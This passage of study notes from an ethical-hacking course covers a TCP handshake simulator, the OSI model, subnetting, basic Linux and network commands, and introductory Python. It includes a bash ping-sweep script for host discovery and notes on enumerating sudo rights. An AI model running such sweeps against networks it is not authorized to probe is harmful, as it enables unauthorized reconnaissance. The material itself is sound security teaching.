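Only the header fields the handshake needs are modelled; nothing is sent on a network."""
from dataclasses import dataclass, field


@dataclass
class Segment:
    """The TCP header fields that matter here."""
    src: str
    dst: str
    flags: frozenset            # subset of {"SYN", "ACK"}; empty means a plain data segment
    seq: int                    # sequence number of this segment
    ack: int = 0                # acknowledgement number (meaningful only when "ACK" is set)
    payload: bytes = b""

    def __str__(self) -> str:
        name = "+".join(sorted(self.flags, reverse=True)) or "DATA"
        return f"{self.src} -> {self.dst} {name} seq={self.seq} ack={self.ack}"


@dataclass
class Endpoint:
    name: str
    isn: int                    # initial sequence number; real stacks randomise it
    state: str = "CLOSED"
    snd_nxt: int = 0            # next sequence number this side will send
    rcv_nxt: int = 0            # next sequence number this side expects to receive
    log: list = field(default_factory=list)

    def send(self, dst: str, flags, seq: int, ack: int = 0, payload: bytes = b"") -> Segment:
        seg = Segment(self.name, dst, frozenset(flags), seq, ack, payload)
        self.log.append(str(seg))
        return seg


def client_open(client: Endpoint, server_name: str) -> Segment:
    """Step 1 (SYN): the client announces its ISN and moves to SYN_SENT."""
    client.state = "SYN_SENT"
    client.snd_nxt = client.isn + 1           # the SYN flag itself consumes one sequence number
    return client.send(server_name, {"SYN"}, seq=client.isn)


def server_on_syn(server: Endpoint, syn: Segment) -> Segment:
    """Step 2 (SYN-ACK): a listening server acknowledges ISN+1 and sends its own ISN."""
    if server.state != "LISTEN" or syn.flags != {"SYN"}:
        raise RuntimeError(f"{server.name}: unexpected {syn} in state {server.state}")
    server.rcv_nxt = syn.seq + 1
    server.snd_nxt = server.isn + 1
    server.state = "SYN_RECEIVED"             # half-open: resources are held until the final ACK
    return server.send(syn.src, {"SYN", "ACK"}, seq=server.isn, ack=server.rcv_nxt)


def client_on_synack(client: Endpoint, synack: Segment) -> Segment:
    """Step 3 (ACK): the client checks the acknowledgement and completes the handshake."""
    if client.state != "SYN_SENT" or synack.flags != {"SYN", "ACK"}:
        raise RuntimeError(f"{client.name}: unexpected {synack} in state {client.state}")
    if synack.ack != client.isn + 1:
        # A SYN-ACK that does not acknowledge exactly ISN+1 is discarded; this check is only
        # meaningful when the ISN is unpredictable, which is why real stacks randomise it.
        raise RuntimeError(f"{client.name}: bad ack {synack.ack}, expected {client.isn + 1}")
    client.rcv_nxt = synack.seq + 1
    client.state = "ESTABLISHED"
    return client.send(synack.src, {"ACK"}, seq=client.snd_nxt, ack=client.rcv_nxt)


def server_on_ack(server: Endpoint, ack: Segment) -> None:
    """Final step on the server: the ACK must match its own ISN+1 and the expected client seq."""
    if server.state != "SYN_RECEIVED" or "ACK" not in ack.flags:
        raise RuntimeError(f"{server.name}: unexpected {ack} in state {server.state}")
    if ack.ack != server.isn + 1 or ack.seq != server.rcv_nxt:
        raise RuntimeError(f"{server.name}: ack/seq mismatch in {ack}")
    server.state = "ESTABLISHED"


def send_data(sender: Endpoint, receiver: Endpoint, payload: bytes) -> bool:
    """Post-handshake: a segment is accepted only if it carries the sequence number expected."""
    seg = sender.send(receiver.name, set(), seq=sender.snd_nxt, ack=sender.rcv_nxt, payload=payload)
    sender.snd_nxt += len(payload)
    if seg.seq != receiver.rcv_nxt:
        return False                          # out of order: a real stack buffers or drops it
    receiver.rcv_nxt += len(payload)
    return True


def handshake(client_isn: int = 1000, server_isn: int = 5000):
    """Run the full SYN / SYN-ACK / ACK exchange and return both endpoints."""
    client = Endpoint("client", client_isn)
    server = Endpoint("server", server_isn, state="LISTEN")
    syn = client_open(client, server.name)
    synack = server_on_syn(server, syn)
    ack = client_on_synack(client, synack)
    server_on_ack(server, ack)
    return client, server


def abandoned_handshake(client_isn: int = 1000, server_isn: int = 5000) -> Endpoint:
    """SYN and SYN-ACK only: the server is left half-open in SYN_RECEIVED."""
    client = Endpoint("client", client_isn)
    server = Endpoint("server", server_isn, state="LISTEN")
    server_on_syn(server, client_open(client, server.name))
    return server
```

Run `handshake()` and print `client.log + server.log` to see the three segments in order; `abandoned_handshake()` shows the state a server is stuck in when the final ACK never arrives, which is the resource that connection-table limits and SYN cookies exist to bound.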
-------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/03. Networking Refresher/06. The OSI Model.md: -------------------------------------------------------------------------------- 1 | # The OSI Model 2 | > 12.11.2023 3 | --- 4 | 5 | The *OSI (Open Systems Interconnection) model* is a *framework organizing communication systems into seven layers*, each with specific functions. This structured approach aids in *understanding and designing network protocols*. 6 | 7 | **Mnemonic** 8 | 9 | ``` 10 | Please / Physical Layer 11 | Do / Data Link Layer 12 | Not / Network Layer 13 | Throw / Transport Layer 14 | Sausage / Session Layer 15 | Pizza / Presentation Layer 16 | Away / Application Layer 17 | ``` 18 | 19 | ![[Network Refresher - OSI Model.png]] 20 | 21 | **Physical Layer:** 22 | - Handles *raw data transmission* over a physical medium. 23 | - *Defines electrical, mechanical, and functional* characteristics. 24 | 25 | **Data Link Layer:** 26 | - Ensures *reliable data frame transmission* between connected nodes. 27 | - *Manages error detection*, correction, flow control, and medium access. 28 | 29 | **Network Layer:** 30 | - *Routes data packets* across networks. 31 | - *Deals with logical addressing* and determines the best path using protocols like IP. 32 | 33 | **Transport Layer:** 34 | - *Ensures reliable data delivery* between end systems. 35 | - *Manages segmentation*, end-to-end communication, error recovery, and flow control with protocols like TCP and UDP. 36 | 37 | **Session Layer:** 38 | - *Establishes*, manages, and terminates *communication sessions*. 39 | - *Provides synchronization*, dialog control, checkpointing, and recovery. 40 | 41 | **Presentation Layer:** 42 | - *Handles data representation*, encryption, compression, and formatting. 43 | - *Ensures* data sent by one system is understandable by another. 
**Application Layer:**
- *Closest to the end-user*, providing services like file transfer, email, and web browsing.
- Includes protocols such as *HTTP*, *SMTP*, *FTP*, and *DNS*.

**Key Idea:**
- The OSI model *divides network communication into manageable layers*, promoting interoperability, ease of implementation, and troubleshooting.
- It's a *conceptual model*, *not always reflecting exact system implementations*, but remains a valuable reference for understanding network communication and protocols.
--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/03. Networking Refresher/07. Subnetting Part 1 & 2.md:
--------------------------------------------------------------------------------
# Subnetting Part 1 & 2
> 12.11.2023
---

*Subnetting* is the process of *breaking a network into smaller parts* called *subnets*, *enhancing IP address efficiency* and aiding network management. This technique involves *borrowing bits* from the *host section of an IP address* to create *subnet identifiers*, *dividing the network into multiple subnets*, each with its *unique IP address range*.

*CIDR (Classless Inter-Domain Routing) notation* simplifies representing IP addresses and their subnet masks. It *indicates the network prefix length*, *denoting the number of bits used* for the network part of the IP address. CIDR notation *appends a forward slash (/)* and the prefix length to the IP address.

**Example:**
- IP Address: 192.168.0.0/24
- *"/24"* means the first *24 bits* are for the network, and the remaining *8 bits* are for hosts.
- Subnet mask: 255.255.255.0.

To further subnet, you can *borrow additional bits*. If, for example, *2 bits* are borrowed, *4 subnets are created*, and the subnet mask becomes 255.255.255.192 (binary: 11111111.11111111.11111111.11000000).
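A small subnet calculator, added here as an example that is not part of the course notes: it carries the /24 to /26 split above through in code and generalizes it to any IPv4 network and number of borrowed bits. It relies only on Python's standard `ipaddress` module; the function names are my own.

```python
# Added example (not from the course notes): a subnet calculator that
# generalizes the page's /24 -> /26 split to any IPv4 network and bit count.
import ipaddress

IPV4_BITS = 32
OCTET_SHIFTS = (24, 16, 8, 0)


def mask_from_prefix(prefix: int) -> int:
    """Subnet mask as a 32-bit integer: the top `prefix` bits set, the rest clear."""
    if not 0 <= prefix <= IPV4_BITS:
        raise ValueError(f"prefix length must be between 0 and {IPV4_BITS}, got {prefix}")
    return (0xFFFFFFFF << (IPV4_BITS - prefix)) & 0xFFFFFFFF


def dotted(mask: int) -> str:
    """Render a 32-bit mask in dotted-decimal form, e.g. 255.255.255.192."""
    return ".".join(str((mask >> shift) & 0xFF) for shift in OCTET_SHIFTS)


def binary(mask: int) -> str:
    """Render a 32-bit mask as four 8-bit binary groups, as written on the page."""
    return ".".join(f"{(mask >> shift) & 0xFF:08b}" for shift in OCTET_SHIFTS)


def split_network(cidr: str, borrowed_bits: int) -> list[dict]:
    """Borrow `borrowed_bits` host bits from `cidr` and describe every resulting subnet.

    Each entry records the subnet in CIDR form, its first and last address
    (network and broadcast address) and the number of usable host addresses.
    """
    # strict=True rejects addresses with host bits set, e.g. 192.168.0.1/24
    parent = ipaddress.IPv4Network(cidr, strict=True)
    new_prefix = parent.prefixlen + borrowed_bits
    if borrowed_bits < 0 or new_prefix > IPV4_BITS:
        raise ValueError(
            f"cannot borrow {borrowed_bits} bits from /{parent.prefixlen}: "
            f"only {IPV4_BITS - parent.prefixlen} host bits are available"
        )
    result = []
    for sub in parent.subnets(new_prefix=new_prefix):
        # Conventional subnets lose the network and broadcast addresses;
        # /31 (RFC 3021 point-to-point links) and /32 (host routes) do not.
        usable = sub.num_addresses - 2 if new_prefix <= 30 else sub.num_addresses
        result.append({
            "network": str(sub),
            "first": str(sub.network_address),
            "last": str(sub.broadcast_address),
            "usable_hosts": usable,
        })
    return result


def locate_subnet(cidr: str, borrowed_bits: int, address: str) -> str:
    """Return the CIDR of the subnet (after splitting `cidr`) that contains `address`."""
    host = ipaddress.IPv4Address(address)
    for entry in split_network(cidr, borrowed_bits):
        if host in ipaddress.IPv4Network(entry["network"]):
            return entry["network"]
    raise ValueError(f"{address} is not inside {cidr}")


if __name__ == "__main__":
    # The page's example: 192.168.0.0/24 with 2 borrowed bits -> four /26 subnets.
    mask = mask_from_prefix(26)
    print(f"/26 mask: {dotted(mask)} ({binary(mask)})")
    for entry in split_network("192.168.0.0/24", 2):
        print(f'{entry["network"]:<18} {entry["first"]} - {entry["last"]}'
              f'  usable hosts: {entry["usable_hosts"]}')
    print("192.168.0.130 lives in", locate_subnet("192.168.0.0/24", 2, "192.168.0.130"))
```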
**The resulting subnets**:
1. 192.168.0.0/26 (range: 192.168.0.0 - 192.168.0.63)
2. 192.168.0.64/26 (range: 192.168.0.64 - 192.168.0.127)
3. 192.168.0.128/26 (range: 192.168.0.128 - 192.168.0.191)
4. 192.168.0.192/26 (range: 192.168.0.192 - 192.168.0.255)

*Each subnet can serve different purposes* within the network. *CIDR notation provides a concise way to define network boundaries*, fostering efficient address allocation in IP networking.

**Resources:**
Subnet Guide: [Excel Sheet](https://drive.google.com/file/d/1ETKH31-E7G-7ntEOlWGZcDZWuukmeHFe/view)
![[Subnetting Part 1 & 2 Exel sheet.png]]

Seven Second Subnetting: ![](https://www.youtube.com/watch?v=ZxAwQB8TZsM)

--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/04. Introduction to Linux/01. Exploring Kali Linux.md:
--------------------------------------------------------------------------------
# Exploring Kali Linux
> 13.11.2023
---

**Kali Linux Overview:**
[Kali Linux](https://www.kali.org) is a *specialized Linux distro* created for *digital forensics, penetration testing, and ethical hacking*. It serves as a powerful operating system widely utilized by *cybersecurity experts, researchers, and enthusiasts*.

**Purpose:**
- Designed for *digital forensics, penetration testing, and ethical hacking*.
- Used by *cybersecurity professionals* for various security-related tasks.

**Foundation:**
- *Based on Debian* Linux.
- *Includes* a comprehensive set of *pre-installed tools and software* packages.

**Objectives:**
- Aims to be an *all-in-one platform for security assessments*, vulnerability analysis, network scanning, password cracking, and more.
- *Provides tools for web application testing*, reverse engineering, exploit development, and secure communication.
**Security Features:**
- Built with *security* in mind.
- Features *full disk encryption*, *secure shell* access, and regular updates for a secure and up-to-date environment.

**Responsibility:**
- Users are encouraged to employ Kali Linux responsibly and within legal boundaries.
- Emphasizes ethical hacking and security testing with proper authorization and adherence to laws and regulations.

**Summary:**
Kali Linux is a Linux distro tailored for cybersecurity tasks, offering various tools for security testing purposes. Users are urged to use it responsibly and ethically, following legal guidelines for security assessments.
--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/04. Introduction to Linux/02. Sudo Overview.md:
--------------------------------------------------------------------------------
# Sudo Overview
> 13.11.2023
---

**Overview:**
The sudo command in Linux enables a user with appropriate privileges to execute commands as the superuser or as another user. It is commonly used for administrative tasks requiring elevated access.

**Functionality:**
- Allows execution of commands with elevated privileges.
- Facilitates performing administrative tasks on a Linux system.

**Example Usage:**
- General form (`<package>` is a placeholder for the package name):
```
sudo apt install <package>
```

- For installing the "nginx" package:
```
sudo apt install nginx
```

**Execution Process:**
- After entering the sudo command, the user is prompted to enter their password.
- Correct password entry grants superuser privileges for executing the specified command.

**Versatility:**
- Configuration and availability of sudo can vary based on Linux distribution and user privileges.
- Used for diverse administrative tasks like editing system files, managing services, and executing critical commands.

In summary, the sudo command in Linux empowers users to perform administrative tasks by granting temporary superuser privileges. It is a versatile tool allowing various operations, but its usage may vary depending on the Linux distribution and user permissions.
--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/04. Introduction to Linux/03. Navigating the File System.md:
--------------------------------------------------------------------------------
# Navigating the File System
> 13.11.2023
---

**Linux Commands:**
Useful Linux commands.

**pwd (Print Working Directory):**
- *Explanation:* Displays the current working directory.
- *Example:* `pwd` shows the absolute path, e.g., "/home/user/documents".

**cd (Change Directory):**
- *Explanation:* Allows changing the current working directory.
- *Example:* `cd /home/user/documents` changes to "/home/user/documents".

**cd .. (Change to Parent Directory):**
- *Explanation:* Moves up one level in the directory hierarchy.
- *Example:* `cd ..` in "/home/user/documents" goes to "/home/user".

**ls (List Directory Contents):**
- *Explanation:* Lists files and directories in the current directory.
- *Example:* `ls` displays current directory contents.

**ls -la (List Detailed Directory Contents):**
- *Explanation:* Lists detailed info, including hidden files.
- *Example:* `ls -la` shows a detailed list with hidden files.

**mkdir (Make Directory):**
- *Explanation:* Creates a new directory.
- *Example:* `mkdir new_folder` creates "new_folder".

**rmdir (Remove Directory):**
- *Explanation:* Removes an empty directory.
- *Example:* `rmdir empty_folder` removes "empty_folder" if it is empty.

**man (Manual):**
- *Explanation:* Displays manual pages for a command.
- *Example:* `man ls` shows details about the ls command.

**echo:**
- *Explanation:* Displays text or variables as output.
- *Example:* `echo "Hello, world!"` outputs the text in the terminal.

**> (Output Redirection):**
- *Explanation:* Redirects command output to a file (overwrites).
- *Example:* `echo "Hello" > greeting.txt` writes to "greeting.txt".

**>> (Append Output):**
- *Explanation:* Redirects output, appending to a file.
- *Example:* `echo "World!" >> greeting.txt` appends to "greeting.txt".

**rm (Remove):**
- *Explanation:* Deletes files or directories.
- *Example:* `rm file.txt` deletes "file.txt".

**mv (Move):**
- *Explanation:* Moves or renames files and directories.
- *Example:* `mv file.txt new_directory/file_renamed.txt` moves and renames.

**cp (Copy):**
- *Explanation:* Copies files and directories.
- *Example:* `cp file.txt backup/file_copy.txt` creates a copy.

**locate:**
- *Explanation:* Searches for files in a prebuilt database.
- *Example:* `locate myfile.txt` finds and displays the path.

**updatedb:**
- *Explanation:* Updates the locate command's database.
- *Example:* `updatedb` ensures up-to-date search results.

**passwd:**
- *Explanation:* Allows changing a user's password.
- *Example:* `passwd` prompts for the current and new password.

**Caution:** Exercise caution, especially with commands like `rm` that can permanently delete files. Double-check before executing such commands.
--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/04. Introduction to Linux/04. Users and Privileges.md:
--------------------------------------------------------------------------------
# Users and Privileges
> 13.11.2023
---

**Linux Permissions and Commands:**
In the `ls -la` output, the *"rwx"* characters indicate *permissions for the owner*, *group*, and *other users*. Each entity has *read (r)*, *write (w)*, and *execute (x)* permissions, allowing actions like *viewing*, *modifying*, and *executing* files. The format is a *file-type character followed by nine* permission characters: the *owner's, group's, and other users' permissions*, three each.

**For example**:
`-rwxr-x--- 1 user group 4096 May 10 12:34 myfile.txt`
- *File type*: Regular file (`-`)
- *Owner's permissions*: rwx (read, write, execute)
- *Group's permissions*: r-x (read, execute)
- *Other users' permissions*: --- (no permissions)
- *Additional information*: Hard links (1), owner (user), group (group), file size (4096 bytes), last modification (May 10 12:34), file name (myfile.txt).

**chmod (Change Mode):**
- *Explanation:* Changes file or directory permissions.
- *Example:* `chmod +x script.sh` adds execute permission to "script.sh".

**adduser:**
- *Explanation:* Creates a new user account.
- *Example:* `adduser john` creates a user with the username "john".

**su (Switch User):**
- *Explanation:* Allows switching to another user account.
- *Example:* `su jane` switches to the "jane" account after entering the password.

**/etc/sudoers:**
- *Explanation:* The "/etc/sudoers" file contains the sudo configuration.
- *Example:* Viewing `/etc/sudoers` (requires root privileges) shows sudo access and permissions.

**sudo -l:**
- *Explanation:* Lists commands a user can run with sudo privileges.
- *Example:* `sudo -l` displays available commands and permissions.

**Note:** Some commands require *administrative privileges*. Caution is advised when modifying system files or working with user accounts.
--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/04. Introduction to Linux/05. Common Network Commands.md:
--------------------------------------------------------------------------------
# Common Network Commands
> 12.11.2023
---

**ip a:**
- _Explanation:_ Displays network interfaces and associated IP addresses.
- _Example:_ Running `ip a` shows details like IP addresses and MAC addresses for network interfaces.

**ifconfig:**
- _Explanation:_ Displays configuration and status of network interfaces.
- _Example:_ Running `ifconfig` shows IP addresses, MAC addresses, and more for active network interfaces.

**iwconfig:**
- _Explanation:_ Displays configuration and status of wireless network interfaces.
- _Example:_ Running `iwconfig` shows details like signal strength and encryption for active wireless interfaces.

**ip n:**
- _Explanation:_ Displays the neighbor table, showing IP-to-MAC address mappings.
- _Example:_ Running `ip n` reveals the IP and MAC addresses of recently seen neighbors on the local network.

**arp -a:**
- _Explanation:_ Displays the ARP cache, mapping IP addresses to MAC addresses.
- _Example:_ Running `arp -a` shows IP and MAC addresses recently resolved by ARP.

**ip r:**
- _Explanation:_ Displays the routing table, containing network route information.
- _Example:_ Running `ip r` shows destination networks, gateway IP addresses, and interfaces.

**route:**
- _Explanation:_ Displays or manipulates the IP routing table.
- _Example:_ Running `route` shows the routing table, similar to the `ip r` command.

**ping:**
- _Explanation:_ Sends ICMP echo requests to check network connectivity and round-trip time.
- _Example:_ Running `ping 8.8.8.8` sends requests to Google's DNS server, displaying round-trip time and packet loss.

These commands are essential for network troubleshooting, configuration, and obtaining network-related information on Linux systems.
--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/04. Introduction to Linux/06. Viewing, Creating, and Editing Files.md:
--------------------------------------------------------------------------------
# Viewing, Creating, and Editing Files
> 13.11.2023
---

**echo "hello" > hey.txt:**
- *Explanation:* Creates a new file named "hey.txt" with the content "hello" and overwrites it if it exists.
- *Example:* Running `echo "hello" > hey.txt` creates or overwrites "hey.txt" with "hello".

**echo "hello again" >> hey.txt:**
- *Explanation:* Appends "hello again" to an existing "hey.txt" or creates a new file.
- *Example:* Running `echo "hello again" >> hey.txt` appends to "hey.txt".

**touch newfile.txt:**
- *Explanation:* Creates a new empty "newfile.txt" or updates its timestamp if it exists.
- *Example:* Running `touch newfile.txt` creates or updates "newfile.txt".

**nano newfile.txt:**
- *Explanation:* Opens the Nano text editor to create or edit "newfile.txt".
- *Example:* Running `nano newfile.txt` opens Nano for text input.

**mousepad newfile.txt:**
- *Explanation:* Opens the Mousepad text editor for creating or editing "newfile.txt".
- *Example:* Running `mousepad newfile.txt` opens Mousepad for text input.

These commands facilitate file *manipulation and editing* in Linux. `echo` prints text or variables, `touch` creates files or updates timestamps, and `nano` and `mousepad` are *text editors* for direct file creation or modification from the terminal.
--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/04. Introduction to Linux/07. Starting and Stopping Services.md:
--------------------------------------------------------------------------------
# Starting and Stopping Services
> 13.11.2023
---

**sudo service apache2 start:**
- *Explanation:* Starts the Apache web server service.
- *Example:* Running `sudo service apache2 start` initiates the Apache web server, enabling it to serve web pages.

**sudo service apache2 stop:**
- *Explanation:* Stops the Apache web server service.
- *Example:* Running `sudo service apache2 stop` halts the running Apache web server, shutting down active web page serving.

**python3 -m http.server 80:**
- *Explanation:* Starts a simple HTTP server using Python on port 80.
- *Example:* Running `python3 -m http.server 80` starts a basic HTTP server on port 80, serving files from the current directory.

**sudo systemctl enable ssh:**
- *Explanation:* Enables the SSH (Secure Shell) service to start automatically on system boot.
- *Example:* Running `sudo systemctl enable ssh` configures the system to start the SSH service during system startup.

**sudo systemctl disable ssh:**
- *Explanation:* Disables the SSH service from starting automatically on system boot.
- *Example:* Running `sudo systemctl disable ssh` prevents the SSH service from starting automatically during system startup.

These commands are commonly used in *Linux for managing services*, *starting and stopping processes*, and *controlling the automatic startup* of specific services. The `sudo` command grants superuser privileges, and `service` and `systemctl` are used to manage system services.
--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/04. Introduction to Linux/08. Installing and Updating Tools.md:
--------------------------------------------------------------------------------
# Installing and Updating Tools
> 13.11.2023
---

**sudo apt update && sudo apt upgrade:**
- *Explanation:* Updates package lists and upgrades installed packages using the APT package manager on Debian-based Linux systems.
- *Example:* Running `sudo apt update && sudo apt upgrade` updates package lists and upgrades installed packages to their latest versions.

**sudo apt install cron-daemon-common:**
- *Explanation:* Installs the "cron-daemon-common" package via APT, providing common files and utilities for the cron daemon, a time-based job scheduler.
- *Example:* Running `sudo apt install cron-daemon-common` downloads and installs the "cron-daemon-common" package.

**git clone https://github.com/Dewalt-arch/pimpmykali.git:**
- *Explanation:* Clones a Git repository from the specified URL using the Git version control system.
- *Example:* Running `git clone https://github.com/Dewalt-arch/pimpmykali.git` clones the repository, creating a local copy with files and version history.

These commands are *essential in Linux for updating and upgrading packages, installing software, and managing Git repositories*. The `sudo` command grants superuser privileges, `apt` manages packages on Debian-based systems, and `git` handles version control and repository operations.
--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/04. Introduction to Linux/09. Scripting with Bash.md:
--------------------------------------------------------------------------------
# Scripting with Bash
> 13.11.2023
---

**IP Sweeper**
```bash
#!/bin/bash
# Usage: ./ipsweep.sh 192.168.1   (the first three octets of the /24 to sweep)
if [ "$1" == "" ]
then
    echo "You forgot an IP address!"
    echo "Syntax: ./ipsweep.sh 192.168.1"
else
    for ip in `seq 1 254`; do
        # one echo request per host; keep only reply lines and print the responding IP
        ping -c 1 $1.$ip | grep "64 bytes" | cut -d " " -f 4 | tr -d ":" &
    done
fi
```

**Code Analysis:**
```bash
if [ "$1" == "" ]; then
    echo "You forgot an IP address!"
    echo "Syntax: ./ipsweep.sh 192.168.1"
else
```

Checks if the script is called without providing an IP address as an argument. If no argument is provided, it prints a usage message and exits.

```bash
for ip in `seq 1 254`; do
    ping -c 1 $1.$ip | grep "64 bytes" | cut -d " " -f 4 | tr -d ":" &
done
```

- It iterates over a range of IP addresses from 1 to 254.
- For each IP, it uses the `ping` command to send a single ICMP echo request (`-c 1`).
- The output is then filtered using `grep` to extract lines containing "64 bytes".
- `cut` is used to extract the fourth field (the IP address) from the output.
- `tr` is used to delete the trailing colon from the IP address.
- The `&` at the end of the line runs each iteration in the background, allowing for parallel execution.

--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/05. Introduction to Python/01. Introduction.md:
--------------------------------------------------------------------------------
# Introduction
> 13.11.2023
---

## Upcoming Agenda:

- Strings
- Math
- Variables & Methods
- Functions
- Boolean Expressions
- Relational Operators
- Conditional Statements
- Lists
- Tuples
- Looping
- Importing Modules
- Advanced Strings
- Dictionaries
- Sockets
- Tool Building
--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/05. Introduction to Python/02. Strings.md:
--------------------------------------------------------------------------------
# Strings
> 13.11.2023
---

**String Creation:**
```python
my_string = 'Hello, World!'  # or my_string = "Hello, World!"
```

**Accessing Characters:**
- Strings use zero-based indexing.
```python
print(my_string[0])  # Outputs 'H'
```

**String Concatenation:**
- Joining strings using the `+` operator.
```python
greeting = 'Hello' + ' ' + 'World!'  # Results in 'Hello World!'
```

**String Length:**
- Using the `len()` function.
```python
print(len(my_string))  # Outputs the length of the string
```

**String Slicing:**
- Extracting substrings using slicing.
```python
substring = my_string[7:12]  # Extracts 'World'
```

**String Methods:**
- Utilizing built-in methods for string manipulation.
```python
print(my_string.upper())  # Outputs 'HELLO, WORLD!'
```

**String Formatting:**
- Embedding values within a string.
```python
name = 'Alice'
age = 30
print("My name is %s and I'm %d years old." % (name, age))
# Output: My name is Alice and I'm 30 years old.
```

**Example:**
```python
print("Hello, world!")
print('Hello, world!')
print("""This string runs
multiple lines!""")
print("This string is " + "awesome!")  # Concatenation
print('\n')  # New line
print('Test that new line out.')
```

**Additional Notes:**
- Python supports both single and double quotes for string creation.
- Triple quotes (`'''` or `"""`) allow multiline strings.
- String methods provide powerful ways to manipulate string content.
- String formatting enhances readability and flexibility in creating dynamic strings.
- Escape characters like `\n` represent special characters, like a newline.
- Strings in Python are immutable, ensuring that once created, their content cannot be changed.
--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/05. Introduction to Python/03. Math.md:
--------------------------------------------------------------------------------
# Math
> 13.11.2023
---

In Python, the math module provides a range of mathematical functions and constants. To utilize it, import the math module.

**Math Functions in the math Module:**
- `math.sqrt(x)`: Calculates the square root of x.
- `math.pow(x, y)`: Raises x to the power of y.
- `math.exp(x)`: Calculates the exponential value of x (e^x).
- `math.log(x)`: Calculates the natural logarithm of x (base e).
- `math.log10(x)`: Calculates the logarithm of x to base 10.
- `math.sin(x)`, `math.cos(x)`, `math.tan(x)`: Calculate the sine, cosine, and tangent of x in radians.
- `math.degrees(x)`: Converts x from radians to degrees.
- `math.radians(x)`: Converts x from degrees to radians.

**Math Operators:**
- Addition `(+)`
- Subtraction `(-)`
- Multiplication `(*)`
- Division `(/)`
- Integer Division `(//)`: Performs division and returns the quotient as an integer (rounds down).
- Modulo `(%)`: Returns the remainder of division.
- Exponentiation `(**)`: Raises a number to a power.
**Example:**
```python
import math

# Using math functions
print(math.sqrt(25))        # Output: 5.0
print(math.pow(2, 3))       # Output: 8.0
print(math.sin(math.pi/2))  # Output: 1.0

# Using math operators
x = 10
y = 3
print(x + y)   # Output: 13
print(x / y)   # Output: 3.3333333333333335
print(x // y)  # Output: 3
print(x % y)   # Output: 1
print(x ** y)  # Output: 1000

# Additional math operations
print(50 + 50)                  # add
print(50 - 50)                  # subtract
print(50 * 50)                  # multiply
print(50 / 50)                  # divide
print(50 + 50 - 50 * 50 / 50)   # PEMDAS
print(50 ** 2)                  # exponents
print(50 % 6)                   # modulo - takes what is left over
print(50 / 6)                   # division with decimals
print(50 // 6)                  # no remainder
```
--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/05. Introduction to Python/04. Variables and Methods.md:
--------------------------------------------------------------------------------
# Variables and Methods
> 13.11.2023
---

**Variables:**
A variable is a *named storage location* used to *store data or values* in a program. It acts as a *placeholder for data that can be accessed, modified*, or used in calculations throughout the program. Variables in Python are *dynamically typed*, meaning their data type can change during program execution. Here's an example of variable usage in Python:

```python
# Variable assignment
x = 10
name = "John"
is_true = True

# Variable usage
y = x + 5
print("Hello, " + name)
if is_true:
    print("The condition is true")
```

In the example above, `x`, `name`, and `is_true` are variables assigned with different data types (*integer, string, and boolean, respectively*). They are used in calculations and print statements to perform operations and display values.

**Methods:**
A method is a *block of reusable code* that performs a *specific task or action*. Methods are *associated with objects or classes* and are *called upon to perform certain operations*. In Python, methods are commonly referred to as *functions*. Built-in functions and user-defined functions both fall under the category of methods. Here's an example:

```python
# Built-in method example
numbers = [1, 2, 3, 4, 5]
length = len(numbers)
print("Length:", length)

# User-defined method example
def greet(name):
    print("Hello, " + name)

greet("Alice")
```

In the example above, `len()` is a built-in method that calculates the length of a list (`numbers` in this case). The user-defined method `greet()` takes a parameter `name` and prints a greeting message. It is called with the argument "Alice" to print "Hello, Alice" to the console.

Methods can have return values, perform actions, accept parameters, and more, depending on their purpose and design.

**Example Code:**
```python
# Variables and Methods
quote = "All is fair in love and war."
print(quote)

print(quote.upper())  # uppercase
print(quote.lower())  # lowercase
print(quote.title())  # title case
print(len(quote))     # counts characters

name = "Heath"  # string
age = 33        # int
gpa = 3.7       # float - has a decimal

print(int(age))
print(int(30.1))
print(int(30.9))  # Will it round? No!

print("My name is " + name + " and I am " + str(age) + " years old.")

age += 1
print(age)

birthday = 1
age += birthday
print(age)
```
--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/05. Introduction to Python/05. Functions.md:
--------------------------------------------------------------------------------
# Functions
> 14.11.2023
---

**Function Definition:**
A function is *defined* using the `def` keyword, followed by the *function name, parentheses, and a colon*. The function may also have *parameters (optional)* and a *return statement (optional)* to send back a result. Here's an example of a simple function definition:

```python
def greet():
    print("Hello, World!")
```

**Function Call:**
To execute a function, you need to *call it by its name*, followed by parentheses. Here's an example of calling the `greet()` function:

```python
greet()
```

**Function Parameters:**
Functions *can accept parameters*, which are variables that hold values passed to the function when it is called. Parameters allow you to *customize the behavior* of a function based on the values you provide. Here's an example of a function with parameters:

```python
def greet(name):
    print("Hello, " + name + "!")
```

In the example above, the `greet()` function accepts a parameter named `name`. When the function is called with an argument, such as "Alice", *the value is assigned* to the `name` parameter within the function body.

**Return Statement:**
Functions can also *return values* using the `return` statement. The returned value can be *assigned to a variable* or used directly in expressions. Here's an example:

```python
def add_numbers(a, b):
    return a + b

result = add_numbers(3, 4)
print(result)  # Output: 7
```

In this example, the `add_numbers()` function takes two parameters (a and b) and *returns their sum*. The returned value is then assigned to the `result` variable and printed.

Functions provide a way to *encapsulate reusable code* and *improve the structure* of your programs. They can take inputs, perform computations, and produce outputs, allowing you to *modularize your code* and make it more efficient and maintainable.

**Example:**
```python
# Functions
print("Here is an example function:")

def who_am_i():  # this is a function without parameters
    name = "Heath"
    age = 30  # local variable
    print("My name is " + name + " and I am " + str(age) + " years old.")

who_am_i()

# adding parameters
def add_one_hundred(num):
    print(num + 100)

add_one_hundred(100)

# multiple parameters
def add(x, y):
    print(x + y)

add(7, 7)

def multiply(x, y):
    return x * y

multiply(7, 7)         # return value is discarded
print(multiply(7, 7))  # return value is printed: 49

def square_root(x):
    print(x ** 0.5)

square_root(64)

